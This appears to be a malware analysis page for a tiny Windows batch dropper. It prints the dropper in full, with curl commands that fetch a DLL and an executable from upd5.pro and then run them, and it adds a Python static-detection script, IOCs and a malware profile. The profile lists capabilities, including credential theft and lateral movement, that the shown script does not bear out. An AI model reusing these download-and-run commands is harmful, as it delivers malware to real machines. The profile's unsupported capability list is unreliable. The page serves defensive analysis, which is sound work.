Deep Analysis - Dropper BAT (upd5.pro) | Threat: HIGH

File Identity

SHA256: 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d
Size: 326 bytes - only 326 bytes! Ultra-compact dropper
Type: DOS BAT script (Windows batch file)

Full Content

    @echo off
    echo "-> Loading update 2..."
    curl -o 02.dll https://upd5.pro/update/02.dll
    rundll32.exe 02.dll,checkit
    echo "-> Loading update 2 tool..."
    curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe
    ping -n 5 localhost > nul
    qd_x86.exe
    type c:\Windows\System32\conhost.exe > 02.dll
    echo "-> Done."

Technical Analysis

1. curl downloads 02.dll:
   https://upd5.pro/update/02.dll
2. rundll32.exe 02.dll,checkit -> the DLL is executed (export: checkit)
3. curl downloads qd_x86.exe:
   https://upd5.pro/update/qd_x86.exe
4. ping -n 5 localhost -> 5-second wait (sandbox evasion)
5. qd_x86.exe is executed
6. type conhost.exe > 02.dll -> conhost is written over the DLL (trace wiping!)

Domain: upd5.pro -> "update5 pro" = fake update server
Technique: LOLBins (curl, rundll32, ping, type - all built-in Windows tools, so no attacker tooling has to be dropped first; curl has shipped with Windows 10 since version 1803)
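The download -> rundll32 -> delay -> overwrite chain described above is easy to match statically, which is useful when triaging many small batch files at once. The following Python triage script is an added example written for this page, not a tool from the original analysis or from any vendor. It takes the dropper script quoted on the page as sample input (a constructed test fixture), extracts the artefacts an analyst cares about (download URLs and hosts, the DLL export passed to rundll32, loopback ping delays, files overwritten after being dropped, dropped files executed directly) and produces a heuristic score. The scoring weights and the HIGH/MEDIUM/LOW thresholds are assumptions made for illustration, not a standard. The same logic backs the summary in the Malware Profile section below.

```python
import json
import re
from urllib.parse import urlparse

# Constructed sample: the dropper script quoted on this page, used here only as
# input for static analysis. Nothing in this file executes it.
SAMPLE_BAT = r'''@echo off
echo "-> Loading update 2..."
curl -o 02.dll https://upd5.pro/update/02.dll
rundll32.exe 02.dll,checkit
echo "-> Loading update 2 tool..."
curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe
ping -n 5 localhost > nul
qd_x86.exe
type c:\Windows\System32\conhost.exe > 02.dll
echo "-> Done."
'''

# One regex per LOLBin pattern from the analysis above.
CURL_RE = re.compile(r'^\s*curl\b.*?\s-o\s+(\S+).*?(https?://\S+)', re.I)
RUNDLL_RE = re.compile(r'^\s*rundll32(?:\.exe)?\s+(\S+?),(\w+)', re.I)
PING_RE = re.compile(r'^\s*ping\s+-n\s+(\d+)\s+(localhost|127\.0\.0\.1)', re.I)
TYPE_RE = re.compile(r'^\s*type\s+(\S+)\s*>\s*(\S+)', re.I)
EXEC_EXT = ('.exe', '.dll', '.scr', '.bat', '.cmd', '.ps1')


def _basename(path: str) -> str:
    """Last component of a Windows or POSIX path, lower-cased for comparison."""
    return re.split(r'[\\/]', path.strip('"'))[-1].lower()


def analyze_batch(text: str) -> dict:
    """Static triage of a batch script for the download -> run -> wipe pattern.

    Returns the extracted artefacts plus a heuristic score. The weights below
    are assumptions for this example, not an established scoring scheme.
    """
    report = {"downloads": [], "dll_exports": [], "delays": [], "overwrites": [],
              "direct_exec": [], "score": 0}
    dropped = set()  # basenames written to disk by 'curl -o'
    for raw in text.splitlines():
        line = raw.strip()
        m = CURL_RE.match(line)
        if m:
            out, url = _basename(m.group(1)), m.group(2)
            host = urlparse(url).hostname or ""
            report["downloads"].append({"url": url, "host": host, "out": out})
            dropped.add(out)
            if out.endswith(EXEC_EXT):
                report["score"] += 2  # executable content fetched from the network
            continue
        m = RUNDLL_RE.match(line)
        if m:
            dll, export = _basename(m.group(1)), m.group(2)
            report["dll_exports"].append({"dll": dll, "export": export})
            # Loading a DLL that this same script just downloaded weighs more
            # than rundll32 on an arbitrary DLL.
            report["score"] += 3 if dll in dropped else 1
            continue
        m = PING_RE.match(line)
        if m:
            report["delays"].append(int(m.group(1)))  # loopback ping used as a sleep
            report["score"] += 1
            continue
        m = TYPE_RE.match(line)
        if m:
            src, dst = _basename(m.group(1)), _basename(m.group(2))
            report["overwrites"].append({"src": src, "dst": dst})
            if dst in dropped:
                report["score"] += 3  # legitimate bytes written over a dropped payload
            continue
        first = line.split()[0] if line else ""
        if _basename(first) in dropped:
            report["direct_exec"].append(_basename(first))  # dropped file run by name
            report["score"] += 1
    report["c2_hosts"] = sorted({d["host"] for d in report["downloads"]})
    score = report["score"]
    report["verdict"] = "HIGH" if score >= 6 else "MEDIUM" if score >= 3 else "LOW"
    return report


if __name__ == "__main__":
    print(json.dumps(analyze_batch(SAMPLE_BAT), indent=2))
```

Run on the sample, the report lists upd5.pro as the only contacted host, the checkit export loaded from the dropped 02.dll, the 5-count loopback ping, conhost.exe written over 02.dll, and qd_x86.exe executed directly, which together push the verdict to HIGH; a script that only fetches a text file scores LOW. The matcher keys on file names as written in the script, so a sample that builds its paths at runtime from variables would need the variables expanded first.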

IOC

SHA256: 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d
C2: https://upd5.pro/update/02.dll
C2: https://upd5.pro/update/qd_x86.exe
Technique: rundll32 LOLBin, trace wiping (conhost overwrite)

DropperBAT — Malware Profile

Ultra-compact (326 byte) BAT dropper. Uses LOLBins: curl, rundll32, ping, type. Downloads 02.dll and qd_x86.exe from the fake update server upd5.pro. Trace wiping: overwrites the DLL with conhost.exe.

Malware Type
Loader
Programming Language
Batch
C2 Protocol
HTTPS
Target Systems
Global

Capabilities & Behavior

Payload Download
Process Injection
Modular Architecture
Credential Theft
Lateral Movement
Persistence
Anti-VM/Sandbox
Secondary Payload Delivery

IOC List (3 indicators)

IOC — DropperBAT
# SHA256 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d
# URL https://upd5.pro/update/02.dll
# URL https://upd5.pro/update/qd_x86.exe

Type     Value                                                              Note
sha256   3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d
url      https://upd5.pro/update/02.dll
url      https://upd5.pro/update/qd_x86.exe
Tags
lolbins-dropper-curl-rundll32, upd5-pro-fake-update-c2, rundll32-02dll-checkit-export, qd-x86exe-payload-download, ping-sandbox-evasion-5sec, conhost-exe-overwrite-trace-deletion, 326-byte-ultra-compact-dropper, batch-script-malware-dropper